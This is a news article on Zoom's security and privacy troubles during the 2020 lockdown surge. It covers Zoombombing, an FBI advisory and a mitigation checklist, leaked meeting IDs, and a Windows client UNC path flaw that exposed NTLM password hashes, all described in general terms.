Video communication service Zoom has announced a series of steps in a bid to address the growing concerns on security and privacy. The move comes days after the office of New York’s attorney general Letitia James asked Zoom to explain the new security measures it put in place, if any, to address the concerns.
“Over the next 90 days, we are committed to dedicating the resources needed to better identify, address, and fix issues proactively. We are also committed to being transparent throughout this process,” Zoom founder and CEO Eric S Yuan wrote in a blog post, listing the steps Zoom took in the past few days.
Like any online communication tool, Zoom had to accommodate a surge in the number of global users after Covid-related lockdowns, from approximately 10 million in December 2019 to 200 million in March 2020. As the numbers increased, so did the issues, beginning with the global outrage on what was called Zoombombing.
As the usage increased, unsolicited participants started Zoom’s screensharing feature to flood the windows of people in the meeting with unwelcome content -- from lecherous messages to violence or pornography. Zoom’s default setting prohibited the host of a meeting from controlling screen sharing. To avoid it, the host has to go to their admin settings and disable the option before beginning the meeting.
Trend Micro’s Rik Ferguson posted a checklist for those wishing to avoid this situation: Add a meeting password; Screen sharing to ‘host only’; Disable file transfer; Disable ‘Join before host’; Disable ‘Allow removed participants to rejoin’. Zoom later issued a detailed advisory on how to avoid the issue.
“As large numbers of people turn to video-teleconferencing (VTC) platforms to stay connected in the wake of the Covid-19 crisis, reports of VTC hijacking (also called “Zoom-bombing”) are emerging nationwide,” said an FBI advisory.
“As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cyber-security efforts. The following steps can be taken to mitigate teleconference hijacking threats.”
The latest gaffe came from UK prime minister Boris Johnson, who, in his bid to share the efficiency of his cabinet’s online work, shared a screenshot of the UK's first virtual government meeting featuring, giving away the Zoom IDs of the meeting and the participants.
Researchers at cyber-intelligence company Cyjax discovered a public forum "Zoom Leaks" where members are posting meeting IDs for unsecured Zoom meetings.
The surge in usage also increased the risk posed by pre-existing security errors. The Zoom Windows client is susceptible to UNC path injection in the chat feature of the client, which could allow an attacker to steal the Windows credentials of users who click on the link, found researcher @_g0dmode.
Zoom for Windows supports remote UNC paths, which changes convert potentially insecure URLs into hyperlinks when received via chat messages to a recipient in a personal or group chat. Research Matthew Hickey tested the UNC injection and captured the NTLM password hashes being sent to a server hosting the clicked on share.
“These kinds of issues are not unique to Zoom and other solutions have suffered the same and worse in the past,” commented Charl van der Walt, head of security research at Orange Cyberdefence. “In the current climate a little bit of sympathy for the strain the service must be under may be appropriate, but it does need to fix the issues currently on the radar.”
"Remote working is a novel experience for many businesses and we are seeing many employees publicising their experiences across social media channels. While we would not discourage organisations from championing their experiences, we do encourage firms to be responsible in what they share,” suggested William MacDonald, CTO at StarLeaf.
“Displaying a user's ID could easily compromise an organisation. It's important when using a video meeting system users are fully aware of all it's capabilities including the display and security measures in place."